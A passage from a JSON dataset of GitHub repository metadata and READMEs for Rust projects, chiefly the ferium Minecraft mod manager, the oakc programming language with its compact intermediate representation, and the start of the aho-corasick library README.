Since we can only freely bump the patch level, versioning of this crate differs from semver: minor versions may behave like semver major versions and introduce backward-incompatible changes; patch versions may behave like semver minor versions and introduce new APIs. Please peg the version you use accordingly.\n\n**Please realize that this crate is in maintenance-only mode for the most part.** Which means I'll try my best to ensure the crate compiles against all release branches of FFmpeg 3.4 and later (only the latest patch release of each release branch is officially supported) and fix reported bugs, but if a new FFmpeg version brings new APIs that require significant effort to port to Rust, you might have to send me a PR (and just to be clear, I can't really guarantee I'll have the time to review). Any PR to improve existing API is unlikely to be merged, unfortunately.\n\n\ud83e\udd1d **If you have significant, demonstrable experience in Rust and multimedia-related programming, please let me know, I'll be more than happy to invite you as a collaborator.** \ud83e\udd1d\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "gorilla-devs/ferium", "link": "https://github.com/gorilla-devs/ferium", "tags": ["minecraft", "minecraft-mod", "modrinth", "rust", "github-releases", "curseforge", "mod-manager"], "stars": 692, "description": "Fast and multi-source CLI program for managing Minecraft mods and modpacks from Modrinth, CurseForge, and GitHub Releases", "lang": "Rust", "repo_lang": "", "readme": "# Ferium\n\n[![rust badge](https://img.shields.io/static/v1?label=Made%20with&message=Rust&style=for-the-badge&logo=rust&labelColor=e82833&color=b11522)](https://www.rust-lang.org/)\n[![licence badge](https://img.shields.io/github/license/theRookieCoder/ferium?style=for-the-badge)](https://github.com/theRookieCoder/ferium/blob/main/LICENSE.txt)\n[![copyleft badge](https://img.shields.io/static/v1?label=&message=Copyleft&style=for-the-badge&labelColor=silver&color=silver&logo=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADIAAAAyCAQAAAC0NkA6AAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JgAAgIQAAPoAAACA6AAAdTAAAOpgAAA6mAAAF3CculE8AAAAAmJLR0QA/4ePzL8AAAAHdElNRQfjAxYBNgYPa+9oAAAEM0lEQVRYw6WYb0zVVRjHP9wQW7umA0xoKNSC+6bSNkzetKZbaVu19aLpfOGcbcw/S+uNbikuNwMsVyE3XVsro7VEXjS3ylmLxkRtC9crHGjCAv9AATK4CoZye8Hl/J7n/M7v8rvX57w55/lznt/583yf5/xyCEOlrKaSCp6ggCiQYJheLvMHv9HHA1MZ++kmmaZ1UUNZ9g6eo4X7aR3Mtvs0syJzB0U0MR3KgddOsiQTFxsZzdDBTLvFetd0OT5OHo1U+7j9tNJBN4MkgChFVLCS1Sz1aR7jHf5Lv4Yov1hfN8YRKgP1V9LIuGVxhmg6Fwv4XalPcJD8OTe3gA+YVHYXgt3kWato46nQp1jOWWs1eW7Fz5VaLbkZ3cdc6pX9UfeNkvd+a1aRtV3Fle+mLeGWEO/0mT/EWo7SxhBjjNDPKfbxtMPNVjHLKMVa+I0Q1lmG89nDTWdctPGqz80hIT+uAWRaGOqzeJEraQOw2YrzXNqNbJrlnqDFsCeJKZO3uDtnnN+wNq6cCSM74SGtd1wHlfrOkHAyyDPKrk5codIZ1n7DSlAoVF9iKjRq/cVCYZnPmJHsnWF1GcYRobiQf3yA3sr7VPM2cXp9br5Va2k0/EsAy4SixKh6a5LT6rQibGBAyaeV9SohWQabzeBvhUcTaoqPHHhdTKfSOaWk1wx/E8TN4CuhssW6pjnOCF/KiNrOxULWZPgNEbEJF4VKFT2mdbGLpNNJPzVqC9eKkTdbDK4ajy9ngVaPiHuU5AshWWe4VyIsMuwbWTi5Q7sYlYj+TdNbFBHpJZEV8vao8sOjMS8VRh64MkumrRhSh5UQ+T278s+jQdF/1PTGI4yaweNZuHiYF1RsyCiapdFcengyNajgZyP4RBhP8RpDAU42KcxqE30vNK7KYJQpploFY1NgnfmvApYiZxpskLAi6/PFVh454HBRyJ9K5yclvS5hJQggP7YA8vvZzJCi1+m3NKoUYnj8Eg31jSonDFuTTPEju9nIZuq55IP6FvUJ3iF0zjBqApLWOu6FTlp9FCgM90rX9/zpt1Z9z56QLkasatnLRfe8TT5pmHetQqI6RAoesB5A5aIy/s5jrxAl0VmrJHqFvrQuflCwCPM4Jy71s1L0tTA75IPzAyo5ea3D8eg5LORf2mWqnGaXz3Q+b3CcDm6nCtBfqeV5R+xsUyf1mC3eoBLp9qzAcocquN90qRxTW/Fhxk+Hw8o+HvQIOqPU2qkI7SLGeauAmhf8YrygVCepU0HmpkLqLaQ7nz43Ra3VJBknzqpA/SrivofpaduF64n9Kdt83OupJ/YA48ACiolRyRpHovuMd5kKs8PrA+JirjbsvlFBlE9DyP8qXnQ3+eNiblpOc+gfOCc0gGRGpeyzymq7dbLXSmch/q24qIQ1VBKjjMLUT7UheunmIq2qQgmg/wHquM6d9tIV7AAAACV0RVh0ZGF0ZTpjcmVhdGUAMjAxOS0wMy0yMlQwMTo1NDowNiswMDowMOIizoUAAAAldEVYdGRhdGU6bW9kaWZ5ADIwMTktMDMtMjJUMDE6NTQ6MDYrMDA6MDCTf3Y5AAAAAElFTkSuQmCC)](https://en.wikipedia.org/wiki/Copyleft)\n\n> Check out ferium's sister projects [ferinth](https://github.com/gorilla-devs/ferinth) and [furse](https://github.com/gorilla-devs/furse) \n> They are Rust wrappers for the official Modrinth and CurseForge APIs respectively\n\nFerium is a fast and feature rich CLI program for downloading and updating Minecraft mods from [Modrinth](https://modrinth.com/mods), [CurseForge](https://curseforge.com/minecraft/mc-mods), and [GitHub Releases](https://docs.github.com/en/repositories/releasing-projects-on-github/about-releases), and modpacks from [Modrinth](https://modrinth.com/modpacks) and [CurseForge](https://curseforge.com/minecraft/modpacks).\nSimply specify the mods or modpacks you use through the CLI, and in just one command you can download all the mods or the modpack you configured.\n\n## Features\n\n- Download mods from multiple sources, namely [Modrinth](https://modrinth.com/mods), [CurseForge](https://curseforge.com/minecraft/mc-mods), and [GitHub Releases](https://docs.github.com/en/repositories/releasing-projects-on-github/about-releases)\n- Download modpacks from multiple sources, namely [Modrinth](https://modrinth.com/modpacks) and [CurseForge](https://curseforge.com/minecraft/modpacks)\n-
\n Pleasing and beautiful UI\n\n - Listing mods\n ![Listing Mods](media/list.png)\n - Listing mods verbosely\n ![Listing Mods Verbosely](media/list%20verbose.png)\n - Upgrading mods/modpacks\n ![Upgrading Mods/Modpacks](media/upgrade.png)\n
\n\n-
\n It's super fast due to multithreading for network intensive tasks\n\n Your results may vary depending on your internet connection.\n\n It downloads my modpack [Kupfur](https://github.com/theRookieCoder/Kupfur) with 79 mods in 15 seconds:\n\n https://user-images.githubusercontent.com/60034030/212559027-2df10657-82a3-407c-875d-9981628bbfc2.mp4\n\n It downloads [MMTP](https://www.curseforge.com/minecraft/modpacks/mats-mega-tech-pack), the largest modpack with around 400 mods, in just under a minute:\n\n https://user-images.githubusercontent.com/60034030/201951498-62d1e6d9-8edb-4399-b02c-f2562ae566e3.mp4\n
\n\n- Upgrade all your mods in one command, `ferium upgrade`\n - Ferium checks that the version being downloaded is the latest one compatible with the chosen mod loader and Minecraft version\n - You can configure overrides for mods that are not specified as compatible but still work\n- Download and install your modpack in one command, `ferium modpack upgrade`\n- Create multiple profiles and configure different mod loaders, Minecraft versions, output directories, and mods for each\n\n## Installation\n\nFerium builds from GitHub Releases do not require any external dependencies at runtime. \nIf you compile from source, using GCC to build will result in binaries that require GCC to be available at runtime. \nOn Linux, the regular version requires some sort of desktop environment that offers an XDG Desktop Portal.\nThe `nogui` versions do not need this as they don't have a GUI file picker, making these variants suitable for servers.\n\n### Packages\n\n[Coming to more package managers soon\u2122](https://github.com/theRookieCoder/ferium/issues/42)\n\n#### [Arch User Repository](https://aur.archlinux.org) for _Arch Linux_\n\n[![AUR](https://repology.org/badge/version-for-repo/aur/ferium.svg)](https://aur.archlinux.org/packages?K=ferium)\n\n> **Warning** \n> From-source builds will install the Rust toolchain and GCC\n\n| Installation method | GUI file dialogue | No GUI |\n|-------------------------------------------------|-------------------------------------------------------------------------|-------------------------------------------------------------|\n| Install pre-built binaries from GitHub Releases | **[ferium-gui-bin](https://aur.archlinux.org/packages/ferium-gui-bin)** | [ferium-bin](https://aur.archlinux.org/packages/ferium-bin) |\n| Build from source at the latest tag | [ferium-gui](https://aur.archlinux.org/packages/ferium-gui) | [ferium](https://aur.archlinux.org/packages/ferium) |\n| Build from source using the latest commit | [ferium-gui-git](https://aur.archlinux.org/packages/ferium-gui-git) | [ferium-git](https://aur.archlinux.org/packages/ferium-git) |\n\n#### [Homebrew](https://brew.sh) for _macOS_ or _Linux_\n[![Homebrew](https://repology.org/badge/version-for-repo/homebrew/ferium.svg)](https://formulae.brew.sh/formula/ferium)\n```bash\nbrew install ferium\n```\n\n#### [Scoop](https://scoop.sh) for _Windows_\n[![Scoop](https://repology.org/badge/version-for-repo/scoop/ferium.svg)](https://scoop.sh/#/apps?q=ferium)\n```bash\nscoop bucket add games\nscoop install ferium\n```\n\n#### [Pacstall](https://pacstall.dev) for _Ubuntu_\n[![Pacstall](https://repology.org/badge/version-for-repo/pacstall/ferium.svg)](https://pacstall.dev/packages/ferium-bin)\n```bash\npacstall -I ferium-bin\n```\n\n#### [Nixpkgs](https://nixos.wiki/wiki/Nixpkgs) for _NixOS_ or _Linux_\n[![Nixpkgs unstable](https://repology.org/badge/version-for-repo/nix_unstable/ferium.svg)](https://search.nixos.org/packages?show=ferium&channel=unstable)\n> **Note** \n> See package page for installation instructions\n\n#### [crates.io](https://crates.io) for the _Rust toolchain_\n[![crates.io](https://repology.org/badge/version-for-repo/crates_io/rust:ferium.svg)](https://crates.io/crates/ferium)\n```bash\ncargo install ferium\n```\n> **Warning** \n> Remember to use an add-on like [cargo-update](https://crates.io/crates/cargo-update) to keep ferium updated to the latest version!\n\n#### [GitHub Releases](https://docs.github.com/en/repositories/releasing-projects-on-github/about-releases) for _any platform_\n[![GitHub Releases](https://img.shields.io/github/v/release/gorilla-devs/ferium?color=bright-green&label=github%20releases)](https://github.com/gorilla-devs/ferium/releases)\n> **Warning** \n> You will have to manually download and install every time there is a new update\n\n1. Download the asset suitable for your operating system from [the latest release](https://github.com/gorilla-devs/ferium/releases/latest)\n2. Unzip the file and move it to a folder in your path, e.g. `~/bin`\n3. Remember to check the releases page for any updates!\n\n## Overview / Help Page\n\n> **Note** \n> A lot of ferium's backend is in a separate project [libium](https://github.com/theRookieCoder/libium). \n> It deals with things such as the config, adding mod(pack)s, upgrading, file pickers, etc.\n\nFerium stores profile and modpack information in its config file. By default it is located at `~/.config/ferium/config.json`, but you can change this in 2 ways. You can set the `FERIUM_CONFIG_FILE` environment variable or set the `--config-file` global command flag, the flag always takes precedence.\n\nYou can also set a custom CurseForge API key or GitHub personal access token using the `CURSEFORGE_API_KEY` and `GITHUB_TOKEN` environment variables or the `--curseforge_api_key` and `--github-token` flags respectively. Again, the flags take precedence.\n\n### First Startup\n\nYou can either have your own set of mods in what is called a 'profile', or install a modpack.\n\n- Create a new profile by running `ferium profile create` and entering the details for your profile\n - Then, add your mods using `ferium add`\n - Finally, download your mods using `ferium upgrade`\n- Add a modpack by running `ferium modpack add `\n - After which, run `ferium modpack upgrade` to download and install the modpack\n\n### Adding Mods\n\n- Modrinth\n - `ferium add project_id`\n - Where `project_id` is the slug or project id of the mod\n - For example, [Sodium](https://modrinth.com/mod/sodium) has the slug `sodium` and a project id `AANobbMI`\n - You can find the slug in the website url (`modrinth.com/mod/`), and the project id at the bottom of the left sidebar under 'Technical information'\n - So to add [Sodium](https://modrinth.com/mod/sodium), you should run `ferium add sodium` or `ferium add AANobbMI`\n- CurseForge\n - `ferium add project_id`\n - Where `project_id` is the project id of the mod\n - For example, [Terralith](https://www.curseforge.com/minecraft/mc-mods/terralith) has a project id `513688`\n - You can find the project id at the top of the right sidebar under 'About Project'\n - So to add [Terralith](https://www.curseforge.com/minecraft/mc-mods/terralith), you should run `ferium add 513688`\n- GitHub\n - `ferium add owner/name`\n - Where `owner` is the username of the owner of the repository and `name` is the name of the repository (both case-insensitive)\n - For example [Sodium's repository](https://github.com/CaffeineMC/sodium-fabric) has the id `CaffeineMC/sodium-fabric`\n - You can find these at the top left part of the repository's page as a big 'owner / name'\n - So to add [Sodium](https://github.com/CaffeineMC/sodium-fabric), you should run `ferium add CaffeineMC/sodium-fabric` (again, case-insensitive)\n - Note: The GitHub repository has to release JAR files in their Releases for ferium to download, or else it will refuse to be added\n\n#### Add External Mods\n\nIf you want to use files that are not downloadable by ferium, place them in the `user` folder in the output directory. Files here will be copied to the output directory when upgrading.\n\n> **Warning** \n> Profiles with the Quilt mod loader selected will not copy their `user` mods, this is because Quilt loads mods from nested directories as well (for loader versions above `0.18.1-beta.3`)\n\n### Adding Modpacks\n\n- Modrinth Modpacks\n - `ferium modpack add project_id`\n - Where `project_id` is the slug or project id of the modpack\n - For example, [Better Minecraft](https://modrinth.com/modpack/better-minecraft) has the slug `better-minecraft` and a project id `shFhR8Vx`\n - You can find the slug in the website url (`modrinth.com/modpack/`), and the project id at the bottom of the left sidebar under 'Technical information'\n - So to add [Better Minecraft](https://modrinth.com/modpack/better-minecraft), you should run `ferium modpack add better-minecraft` or `ferium modpack add shFhR8Vx`\n- CurseForge Mods\n - `ferium modpack add project_id`\n - Where `project_id` is the project id of the modpack\n - For example, [RLCraft](https://www.curseforge.com/minecraft/modpacks/rlcraft) has a project id `285109`\n - You can find the project id at the top of the right sidebar under 'About Project'\n - So to add [RLCraft](https://www.curseforge.com/minecraft/modpacks/rlcraft), you should run `ferium modpack add 285109`\n\n### Upgrading Mods\n\n> **Note** \n> If your output directory is not empty when setting it, ferium will offer to create a backup.\n> Please do so if it contains any files you would like to keep\n\nNow after adding all your mods, run `ferium upgrade` to download all of them to your output directory.\nThis defaults to `.minecraft/mods`, where `.minecraft` is the default Minecraft resources directory. You don't need to worry about this if you play with Mojang's launcher (unless you changed the resources directory).\nYou can choose to pick a custom output directory during profile creation or [change it later](#profiles).\n\nIf ferium fails to download a mod, it will print its name in red and give the reason. It will continue downloading the rest of the mods and will exit with an error.\n\n> **Warning** \n> When upgrading, any files not downloaded by ferium will be moved to the `.old` folder in the output directory\n\n### Upgrading Modpacks\n\n> **Note** \n> If your output directory's `mods` and `resourcepacks` are not empty when setting it, ferium will offer to create a backup.\n> Please do so if it contains any files you would like to keep\n\nNow after adding all your mods, run `ferium modpack upgrade` to download the modpack to your output directory.\nThis defaults to `.minecraft`, which is the default Minecraft resources directory. You don't need to worry about this if you play with Mojang's launcher (unless you changed the resources directory).\nYou can choose to pick a custom output directory when adding modpacks or [change it later](#managing-modpacks).\n\nIf ferium fails to download a mod, it will print its name in red and give the reason. It will continue downloading the rest of the mods and will exit with an error.\n\n> **Warning** \n> If you choose to install modpack overrides, your existing configs may be overwritten\n\n### Managing Mods\n\nYou can see all the mods in your current profile by running `ferium list`. If you want to see more information about them, you can run `ferium list -v` or `ferium list --verbose`.\n\nYou can remove any of your mods by running `ferium remove`, selecting the ones you would like to remove by using the space key, and pressing enter once you're done.\nYou can also provide the names of the mods to remove as arguments. Mod names with spaces have to be given in quotes (`ferium remove \"ok zoomer\"`) or the spaces should be escaped (`ferium remove ok\\ zoomer`).\n\n#### Check Overrides\n\nIf some mod is compatible with your profile but ferium does not download it, [create an issue]((https://github.com/theRookieCoder/ferium/issues/new)) if you think it's a bug. You can disable the game version or mod loader checks by using the `--dont-check-game-version` and/or `--dont-check-mod-loader` flags when adding the mod, or manually setting `check_game_version` or `check_mod_loader` to false for the specific mod in the config.\n\nFor example, [Just Enough Items](https://www.curseforge.com/minecraft/mc-mods/jei) does not specify the mod loader for older minecraft versions such as `1.12.2`. In this case, you would add JEI by running `ferium add 238222 --dont-check-mod-loader` so that the mod loader check is disabled.\nYou can also manually disable the mod loader (and/or game version) check(s) in the config like so\n```json\n{\n \"name\": \"Just Enough Items (JEI)\",\n \"identifier\": {\n \"CurseForgeProject\": 238222\n },\n \"check_mod_loader\": false\n}\n```\n\n### Managing Modpacks\n\n#### Add\nWhen adding a modpack, you will configure the following:\n\n- Output directory\n - This defaults to `.minecraft`, which is the default Minecraft resources directory. You don't need to worry about this if you play with Mojang's launcher (unless you changed the resources directory)\n- Whether to install modpack overrides\n\nYou can also provide these settings as flags.\nFerium will automatically switch to the newly added modpack.\n\n#### Configure\n\nYou can configure these same settings afterwards by running `ferium modpack configure`.\nAgain, you can provide these settings as flags.\n\n#### Manage\n\nYou can see all the modpack you have configured by running `ferium modpack list`.\nSwitch between your modpacks using `ferium modpack switch`.\nDelete a profile by running `ferium modpack delete` and selecting the modpack you want to delete.\n\n### Profiles\n\n#### Create\nYou can create a profile by running `ferium profile create` and configuring the following:\n\n- Output directory\n - This defaults to `.minecraft/mods` where `.minecraft` is the default Minecraft resources directory. You don't need to worry about this if you play with Mojang's launcher (unless you changed the resources directory)\n- Name of the profile\n- Minecraft version\n- Mod loader\n\nYou can also provide these settings as flags.\nIf you want to copy the mods from another profile, provide the `--import` flag. You can also directly provide a profile name to the flag if you don't want a profile picker to be shown.\nFerium will automatically switch to the newly created profile.\n\n#### Configure\n\nYou can configure those same settings afterwards by running `ferium profile configure`.\nAgain, you can provide these settings as flags.\n\n#### Manage\n\nYou can see all the profiles you have by running `ferium profile list`.\nSwitch between your profiles using `ferium profile switch`.\nDelete a profile by running `ferium profile delete` and selecting the profile you want to delete.\n\n## Feature Requests\n\nIf you would like to make a feature request, check the [issues](https://github.com/theRookieCoder/ferium/issues?q=is%3Aissue) to see if the feature has already been added or is planned. If not, [create a new issue](https://github.com/theRookieCoder/ferium/issues/new).\n\n## Building from Source or Working on ferium\n\nFirstly, you need the Rust toolchain which includes `cargo`, `rustup`, etc. You can install these from [the Rust website](https://www.rust-lang.org/tools/install).\nYou can manually run cargo commands, but I recommend [`just`](https://github.com/casey/just#installation), a command runner that's basically a much better version of `make`.\n\nTo build the project and install it to your Cargo binary directory, clone the project and run `just install`. If you want to install it for testing purposes run `just` (alias to `just install-dev`), which builds in debug mode.\n\nYou can run clippy lints using `just lint`, integration tests using `cargo test`, and delete all build and test artefacts using `just clean`.\n\nIf you would like to see instructions for building for specific targets (e.g. Linux ARM), head over to the [workflow file](.github/workflows/build.yml).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "adam-mcdaniel/oakc", "link": "https://github.com/adam-mcdaniel/oakc", "tags": ["c", "golang", "compiler", "compiler-design"], "stars": 692, "description": "A portable programming language with a compact intermediate representation", "lang": "Rust", "repo_lang": "", "readme": "# Oak\n\nAn infinitely more portable alternative to the C programming language.\n\n![Example](assets/example.png)\n\n## Why Oak?\n\nFor those of you that remember [\"free\"](https://github.com/adam-mcdaniel/free), oak is essentially a more robust and high level version of that project. The goal of oak is to be as high level as possible in the frontend, but as small and low level as possible in the backend.\n\n#### About the Author\n\nI'm a freshly minted highschool graduate and freshman in college looking for work. If you enjoy my projects, consider supporting me by buying me a coffee! \n\n\n\n## Intermediate Representation\n\nThe key to oak's insane portability is its incredibly compact backend implementation. _The code for Oak's backend can be expressed in under 100 lines of C._ Such a small implementation is only possible because of the tiny instruction set of the intermediate representation. Oak's IR is only composed of **_17 different instructions_**. That's on par with [brainfuck](https://esolangs.org/wiki/Brainfuck)!\n\nThe backend of oak functions very simply. Every instruction operates on a _memory tape_. This tape is essentially a static array of double-precision floats.\n\n```js\n let x: num = 5.25; ... let p: &num = &x; `beginning of heap`\n | | |\n v v v\n[0, 0, 0, 5.25, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, ...]\n ^\n |\n `current location of the stack pointer`\n```\n\nWhen a variable is defined in a function, it's given a static position relative to the virtual machine's current base pointer. So, when a function is called, space for the function's variables is allocated on the stack, and the base pointer is incremented to use this new space. Then, the compiler just replaces the variable with its address added to the base pointer offset in the rest of the code!\n\nAdditionally, the memory tape functions as a **_stack_** and a **_heap_**. After space for all of the program's variables is assigned, the memory used for the stack begins. The stack _grows_ and _shrinks_ with data throughout the program: when two numbers are summed, for example, they are popped off of the stack and replaced with the result. Similarly, the heap grows and shrinks throughout the program. The heap, however, is used for _dynamically allocated_ data: information with a memory footprint **unknown at compile time**.\n\nNow that you understand how oak's backend fundamentally operates, here's the complete instruction set!\n\n| Instruction | Side Effect |\n|-|-|\n| `push(n: f64);` | Push a number onto the stack. |\n| `add();` | Pop two numbers off of the stack, and push their sum. |\n| `subtract();` | Pop two numbers off of the stack. Subtract the first from the second, and push the result. |\n| `multiply();` | Pop two numbers off of the stack, and push their product. |\n| `divide();` | Pop two numbers off of the stack. Divide the second by the first, and push the result. |\n| `sign();` | Pop a number off of the stack. If it is greater or equal to zero, push `1`, otherwise push `-1`. |\n| `allocate();` | Pop a number off of the stack, and return a pointer to that number of free cells on the heap. |\n| `free();` | Pop a number off of the stack, and go to where this number points in memory. Pop another number off of the stack, and free that many cells at this location in memory. |\n| `store(size: i32);` | Pop a number off of the stack, and go to where this number points in memory. Then, pop `size` numbers off of the stack. Store these numbers in reverse order at this location in memory. |\n| `load(size: i32);` | Pop a number off of the stack, and go to where this number points in memory. Then, push `size` number of consecutive memory cells onto the stack. |\n| `call(fn: i32);` | Call a user defined function by it's compiler assigned ID. |\n| `call_foreign_fn(name: String);` | Call a foreign function by its name in source. |\n| `begin_while();` | Start a while loop. For each iteration, pop a number off of the stack. If the number is not zero, continue the loop. |\n| `end_while();` | Mark the end of a while loop. |\n| `load_base_ptr();` | Load the base pointer of the established stack frame, which is always less than or equal to the stack pointer. Variables are stored relative to the base pointer for each function. So, a function that defines `x: num` and `y: num`, `x` might be stored at `base_ptr + 1`, and `y` might be stored at `base_ptr + 2`. This allows functions to store variables in memory dynamically and as needed, rather than using static memory locations. |\n| `establish_stack_frame(arg_size: i32, local_scope_size: i32);` | Pop off `arg_size` number of cells off of the stack and store them away. Then, call `load_base_ptr` to resume the parent stack frame when this function ends. Push `local_scope_size` number of zeroes onto the stack to make room for the function's variables. Finally, push the stored argument cells back onto the stack as they were originally ordered. |\n| `end_stack_frame(return_size: i32, local_scope_size: i32);` | Pop off `return_size` number of cells off of the stack and store them away. Then, pop `local_scope_size` number of cells off of the stack to discard the stack frame's memory. Pop a value off of the stack and store it in the base pointer to resume the parent stack frame. Finally, push the stored return value cells back onto the stack as they were originally ordered. |\n\nUsing only these instructions, oak is able to implement _**even higher level abstractions than C can offer**_!!! That might not sound like much, but it's very powerful for a language this small.\n\n## Syntax and Flags\n\nThe syntax of oak is heavily inspired by the Rust programming language.\n\nFunctions are declared with the `fn` keyword, and are syntactically identical to Rust functions, with the exception of the `return` semantics. Additionally, user defined types and constants are declared with the `type` and `const` keywords respectively.\n\nSimilar to Rust's outer attributes, Oak introduces many compile time flags. Some of these are demonstrated below along with other Oak features.\n\n![Syntax Example](assets/syntax.png)\n\n## Compilation Process\n\nSo how exactly does the oak compiler work?\n\n1. Flatten structures into their functions\n - Structures in oak work differently than in other languages. The objects themselves are only arrays of memory cells: they don't have _**any**_ members or attributes. Structures _exclusively_ retrieve their data by using **_methods_** to return the addresses of their _\"members\"_. These methods are then flattened into simple functions. So, _`putnumln(*bday.day)`_ becomes _`putnumln(*Date::day(&bday))`_. This is a pretty simple process.\n\n2. Calculate the size of every operation's type\n - Because of the structure of oak's intermediate representation, the type of every expression must be known for compilation to continue. The compiler combs over each expression and find's the size of its type. From here on, the representation of the code looks like this:\n\n```rust\n// `3` is the size of the structure on the stack\nfn Date::new(month: 1, day: 1, year: 1) -> 3 {\n month; day; year\n}\n// self is a pointer to an item of size `3`\nfn Date::day(self: &3) -> &1 { self + 1 }\n\nfn main() -> 0 {\n let bday: 3 = Date::new(5, 14, 2002);\n}\n```\n\n3. Statically compute the program's memory footprint\n - After totalling all the statically allocated data, such as the overall memory size of static variables and string literals, the program preemptively sets aside the proper amount of memory on the stack. This essentially means that the stack pointer is _immediately_ moved to make room for all the data at the start of the program.\n\n4. Convert Oak expressions and statements into equivalent IR instructions\n - Most expressions are pretty straightforward: function calls simply push their arguments onto the stack in reverse order and call a function by it's ID, references to a variable just push their assigned location on the stack as a number, and so on. Method calls, _however_, are a bit tricky.\n\n There are **_many_** different circumstances where a method call is valid. Methods _**always take a pointer to the structure as an argument**_. However, _an object that calls a method is not required to be a pointer_. For example, the following code is valid: _`let bday: Date = Date::new(); bday.print();`_. The variable `bday` is not a pointer, yet the method _`.print()`_ can still be used. Here's why.\n\n When the compiler sees a flattened method call, it needs to find a way to transform the \"instance expression\" into a pointer. For variables, this is easy: just add a reference! For instance expressions that are already pointers, it's even easier: don't do anything! For any other kind of expression, though, it's a bit more verbose. The compiler sneaks in a hidden variable to store the expression, and then compiles the method call again using the variable as the instance expression. Pretty cool, right?\n\n5. Assemble the IR instructions for a target\n - Because oak's IR is so small, it can support several targets. Even better, adding a target is incredibly easy. In oak's crate, there's a trait named `Target`. If you implement each of the IR's instructions for your language using the `Target` trait, then oak can automatically compile all the way down to your new programming or assembly language! _Yes, it's as easy as it sounds!_\n\n## Documentation Tool\n\nTo allow users to read documentation of libraries and files without access to the internet, Oak provides the `doc` subcommand. This allows authors to add documentation attributes to their code to help other users understand their code or API without having to sift through the source and read comments.\n\nHere is some example code.\n```rust\n#[std]\n#[header(\"This file tests Oak's doc subcommand.\")]\n\n#[doc(\"This constant is a constant.\")]\nconst CONSTANT = 3;\n// No doc attribute\nconst TEST = CONSTANT + 5;\n\n#[doc(\"This structure represents a given date in time.\nA Date object has three members:\n|Member|Value|\n|-|-|\n|`month: num` | The month component of the date |\n|`day: num` | The day component of the date |\n|`year: num` | The year component of the date |\")]\nstruct Date {\n let month: num, day: num, year: num;\n\n #[doc(\"The constructor used to create a date.\")]\n fn new(month: num, day: num, year: num) -> Date {\n return [month, day, year];\n }\n\n #[doc(\"Print the date object to STDOUT\")]\n fn print(self: &Date) {\n putnum(self->month); putchar('/');\n putnum(self->day); putchar('/');\n putnumln(self->year);\n }\n}\n\n#[doc(\"This function takes a number `n` and returns `n * n`, or `n` squared.\")]\nfn square(n: num) -> num {\n return n * n\n}\n\nfn main() {\n let d = Date::new(5, 14, 2002);\n d.print();\n}\n```\n\nAnd here is example usage of the `doc` subcommand to print the formatted documentation to the terminal.\n\n![Documentation Example](assets/doc.png)\n\n## Installation\n\n#### Development Build\nTo get the current development build, clone the repository and install it.\n\n```bash\ngit clone https://github.com/adam-mcdaniel/oakc\ncd oakc\ncargo install -f --path .\n```\n\n#### Releases\nTo get the current release build, install from [crates.io](https://crates.io/crates/oakc).\n\n```bash\n# Also works for updating oakc\ncargo install -f oakc\n```\n\n#### After Install\n\nThen, oak files can be compiled with the oakc binary.\n\n```bash\noak c examples/hello_world.ok -c\nmain.exe\n```\n\n## Dependencies\n\n**C backend**\n - Any GCC compiler that supports C99\n\n**Go backend**\n - Golang 1.14 compiler\n\n**TypeScript backend**\n\t- TypeScript 3.9 compiler", "readme_type": "markdown", "hn_comments": "Not to be confused with Oak [0], the precursor of the Java programming language.[0] \nhttps://en.m.wikipedia.org/wiki/Oak_(programming_language)> Every instruction operates on a memory tape. This tape is essentially a static array of double-precision floats.Why doubles? I would think integers are the more primitive type.> About the Author> I'm a freshly minted highschool graduate and freshman in college looking for work.Jesus fuck that's impressive. At that age my mind was on being bad at skateboarding, casual arson and trolling pre-2000 online placesExcellent and fun project. Error handling seems light... especially at runtime, but for a toy, its cool. Hard to argue its more portable than C until it can self host though.I thought this was going to be a troll post that links to Ook: https://esolangs.org/wiki/ook!Having it written and distributed in Rust kind of defeats the whole \u201ccompact\u201d sales pitch, as you now have to download a couple gigabytes to try it out...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "BurntSushi/aho-corasick", "link": "https://github.com/BurntSushi/aho-corasick", "tags": ["aho-corasick", "substring-matching", "finite-state-machine", "text-processing", "search"], "stars": 692, "description": "A fast implementation of Aho-Corasick in Rust.", "lang": "Rust", "repo_lang": "", "readme": "**NOTE:** This README is currently for `aho-corasick 1.0`, which\nis not yet released. The timeline for a release should be within\nthe next few months (as of 2023/01/05). [The README for the\nversion currently on crates.io can be found via the `0.7.20`\ntag.](https://github.com/BurntSushi/aho-corasick/blob/0.7.20/README.md)\n\naho-corasick\n============\nA library for finding occurrences of many patterns at once with SIMD\nacceleration in some cases. This library provides multiple pattern\nsearch principally through an implementation of the\n[Aho-Corasick algorithm](https://en.wikipedia.org/wiki/Aho%E2%80%93Corasick_algorithm),\nwhich builds a finite state machine for executing searches in linear time.\nFeatures include case insensitive matching, overlapping matches, fast searching\nvia SIMD and optional full DFA construction and search & replace in streams.\n\n[![Build status](https://github.com/BurntSushi/aho-corasick/workflows/ci/badge.svg)](https://github.com/BurntSushi/aho-corasick/actions)\n[![crates.io](https://img.shields.io/crates/v/aho-corasick.svg)](https://crates.io/crates/aho-corasick)\n\nDual-licensed under MIT or the [UNLICENSE](https://unlicense.org/).\n\n\n### Documentation\n\nhttps://docs.rs/aho-corasick\n\n\n### Usage\n\nAdd this to your `Cargo.toml`:\n\n```toml\n[dependencies]\naho-corasick = \"1\"\n```\n\n\n### Example: basic searching\n\nThis example shows how to search for occurrences of multiple patterns\nsimultaneously. Each match includes the pattern that matched along with the\nbyte offsets of the match.\n\n```rust\nuse aho_corasick::{AhoCorasick, PatternID};\n\nlet patterns = &[\"apple\", \"maple\", \"Snapple\"];\nlet haystack = \"Nobody likes maple in their apple flavored Snapple.\";\n\nlet ac = AhoCorasick::new(patterns).unwrap();\nlet mut matches = vec![];\nfor mat in ac.find_iter(haystack) {\n matches.push((mat.pattern(), mat.start(), mat.end()));\n}\nassert_eq!(matches, vec![\n (PatternID::must(1), 13, 18),\n (PatternID::must(0), 28, 33),\n (PatternID::must(2), 43, 50),\n]);\n```\n\n\n### Example: ASCII case insensitivity\n\nThis is like the previous example, but matches `Snapple` case insensitively\nusing 